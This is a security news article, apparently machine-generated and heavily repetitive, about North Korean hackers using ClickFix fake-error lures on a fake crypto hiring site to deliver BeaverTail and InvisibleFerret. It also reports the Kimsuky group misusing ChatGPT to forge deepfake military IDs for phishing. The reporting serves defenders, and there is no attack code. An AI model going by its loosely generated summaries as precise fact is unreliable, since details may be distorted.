Ethical Hacking News
DPRK Hackers Employ ClickFix Malware to Deliver BeaverTail in Crypto Job Scams
A recent campaign by DPRK hackers has employed the use of ClickFix lures to deliver malware, specifically the notorious BeaverTail and InvisibleFerret. This article delves into the details of how these hackers are using this social engineering technique to scam victims out of their sensitive information.
The attackers have been targeting marketing and trader roles in cryptocurrency and retail sector organizations, using a fake hiring platform web application created using Vercel as a distribution vector for the malware. The BeaverTail variant associated with this campaign contains a simplified information stealer routine, targeting fewer browser extensions compared to previous variants.
This is just one example of how DPRK hackers are adapting their tactics to reach less technical targets and exploit vulnerabilities in trusted infrastructure. As with any threat, it's essential for users and organizations to remain vigilant and take proactive measures to protect themselves against such attacks.
North Korean hackers are using ClickFix lures to deliver malware, specifically the BeaverTail and InvisibleFerret threats. The attackers target marketing and trader roles in cryptocurrency and retail sector organizations, expanding their scope beyond software development roles. The malware is distributed through a fake hiring platform web application created using Vercel, which captures users' public IP addresses and leads to a shell script execution. At least 230 individuals have been targeted by the Contagious Interview campaign in fake cryptocurrency job interview attacks between January and March 2025. The attackers use ClickFix themes to distribute malicious Node.js applications that deploy malware disguised as updates or essential utilities. The payload is tailored to the victim's operating system and system architecture, and it catalogs victim activities before triggering an email alert.
The world of cyber threats continues to evolve at an alarming rate, with new tactics being employed by hackers to outsmart their victims. One such tactic that has gained attention recently is the use of ClickFix lures to deliver malware, specifically the notorious BeaverTail and InvisibleFerret. This article will delve into the details of how DPRK (Democratic People's Republic of Korea) hackers are using this social engineering technique to scam victims out of their sensitive information.
In a recent report by GitLab Threat Intelligence, it was revealed that North Korean operatives have been leveraging ClickFix lures to target marketing and trader roles in cryptocurrency and retail sector organizations. This is a departure from the usual targets of software development roles, which suggests that the hackers are expanding their scope to reach less technical targets.
The malware in question, BeaverTail, has been linked to the Contagious Interview (aka Gwisin Gang) campaign, which was first exposed by Palo Alto Networks in late 2023. This campaign involves distributing malware to software developers under the pretext of a job assessment. The latest wave of attacks uses ClickFix lures to deliver BeaverTail, with a fake hiring platform web application created using Vercel serving as a distribution vector for the malware.
The attackers are advertising cryptocurrency trader, sales, and marketing roles at various Web3 organizations, urging targets to invest in a Web3 company. Upon landing on the site, users' public IP addresses are captured, and they are instructed to complete a video assessment of themselves. A fake technical error about a non-existent microphone issue is displayed, leading the victim to execute a shell script or Visual Basic Script, which ultimately delivers the malware.
The BeaverTail variant associated with this campaign contains a simplified information stealer routine, targeting fewer browser extensions compared to previous variants. Notably, the Windows version of BeaverTail relies on a password-protected archive shipped along with the malware to load Python dependencies related to InvisibleFerret.
This technique is not new, as threat actors have used trusted infrastructure for malicious purposes in the past. However, this particular campaign appears to be an adaptation of the attack vectors employed by other North Korean groups, such as the Kimsuky group and the Lazarus cluster.
A recent report by SentinelOne, SentinelLabs, and Validin revealed that at least 230 individuals have been targeted by the Contagious Interview campaign in fake cryptocurrency job interview attacks between January and March 2025. The attackers used ClickFix themes to distribute malicious Node.js applications dubbed ContagiousDrop that deployed malware disguised as updates or essential utilities.
The payload is tailored to the victim's operating system and system architecture, and it's also capable of cataloging victim activities and triggering an email alert when the affected individual starts the fake skill assessment. The attackers have been observed examining cyber threat intelligence (CTI) information related to their infrastructure and engaging in a coordinated effort to evaluate new infrastructure before acquisition.
This latest attack wave is significant not only because it employs ClickFix lures but also because it delivers the malware in the form of a compiled binary produced using tools like pkg and PyInstaller for Windows, macOS, and Linux systems. The attackers have refined their attack chains by using password-protected archives to load Python dependencies related to InvisibleFerret.
The use of trusted infrastructure for malicious purposes is a concerning trend, as it highlights the sophistication and adaptability of modern cyber threats. As with any such threat, users are advised to monitor traffic to api.github.com and the creation of suspicious scheduled tasks, indicating persistence.
Furthermore, this campaign raises questions about the effectiveness of cybersecurity measures in protecting against sophisticated social engineering tactics. The Kimsuky group's abuse of OpenAI's ChatGPT to forge deepfake military ID cards in a spear-phishing campaign against South Korean defense-affiliated entities and other individuals focused on North Korean affairs is another concerning trend.
Phishing emails using the military ID deepfake decoy were observed on July 17, 2025, following a series of ClickFix-based phishing campaigns between June 12 and 18. The multi-stage infection chain has been found to employ ClickFix-like CAPTCHA verification pages to deploy an AutoIt script that connects to an external server to run batch file commands issued by the attacker.
This is a real case demonstrating the Kimsuky group's application of deepfake technology, which poses significant risks to national security and individual privacy. As with any threat, it's essential for users and organizations to remain vigilant and take proactive measures to protect themselves against such attacks.
In conclusion, the DPRK hackers' use of ClickFix malware to deliver BeaverTail in crypto job scams highlights the evolving nature of cyber threats and the need for ongoing vigilance. Users must be aware of these tactics and take steps to protect themselves from falling prey to such sophisticated social engineering techniques.
Related Information:
https://www.ethicalhackingnews.com/articles/DPRK-Hackers-Employ-ClickFix-Malware-to-Deliver-BeaverTail-in-Crypto-Job-Scams-ehn.shtml
Published: Sun Sep 21 06:45:30 2025 by llama3.2 3B Q4_K_M
